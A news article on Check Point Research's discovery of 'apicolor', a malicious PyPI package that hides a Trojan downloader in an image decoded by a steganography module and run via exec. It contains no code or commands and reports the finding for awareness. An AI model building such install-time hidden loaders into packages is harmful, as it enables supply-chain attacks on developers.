Cybersecurity researchers at Check Point Research (CPR) have discovered a new malicious package on PyPI, the code repository for the Python programming language that uses an image to deliver a Trojan malware, largely using GitHub.
The threat actors behind this new campaign hope that Python developers will come across “apicolor” sooner or later when searching the web for legitimate projects.
The apparently benign package in development on PyPI, once installed, first installs additional requirements manually and then downloads an image from the Internet. The additional requirements process the image and trigger the output generated by the processing using the exec command.
One of those two requirements is the judyb code, which is basically a steganography module capable of revealing hidden messages in images. That led the researchers back to the image that, it turns out, downloads malicious packets from the Internet to the victim’s endpoint (opens in new tab).
“The direct place to research such packages is GitHub,” the researchers explain. “Researchers searched for code projects using these packages, which helped the team better understand their infection techniques (if someone accidentally installed them and if they did, how it happened). Using this search, it became clear that apicolor and judib are quite niche and little used on GitHub projects.”
Once CPR notified PyPI of its findings, the latter removed the malicious package from its platform.
While the researchers couldn’t figure out who the threat actor was behind this campaign, they did say that the entire ordeal was “carefully planned and thought out,” further stating that the obfuscation techniques on PyPI have evolved.
“We continuously scan PyPI for malicious packages and report them responsibly to PyPI. This one is unique and different from almost any malicious packages we’ve encountered before,” said Ori Abramovsky, Head of Data Science, SpectralOps, a Check Point company.
“This package differs in the way it camouflages its intent and the way it targets PyPI users to infect them with malicious imports on GitHub. Our findings indicate that PyPI malicious packets and their obfuscation techniques are evolving rapidly. The package we have shared here reflects careful and painstaking work. It’s not the ordinary copy and past we often see, but what looks like a real campaign. Creating the GitHub projects, cleverly hiding the code, and downplaying the packages on PyPI are all advanced work.”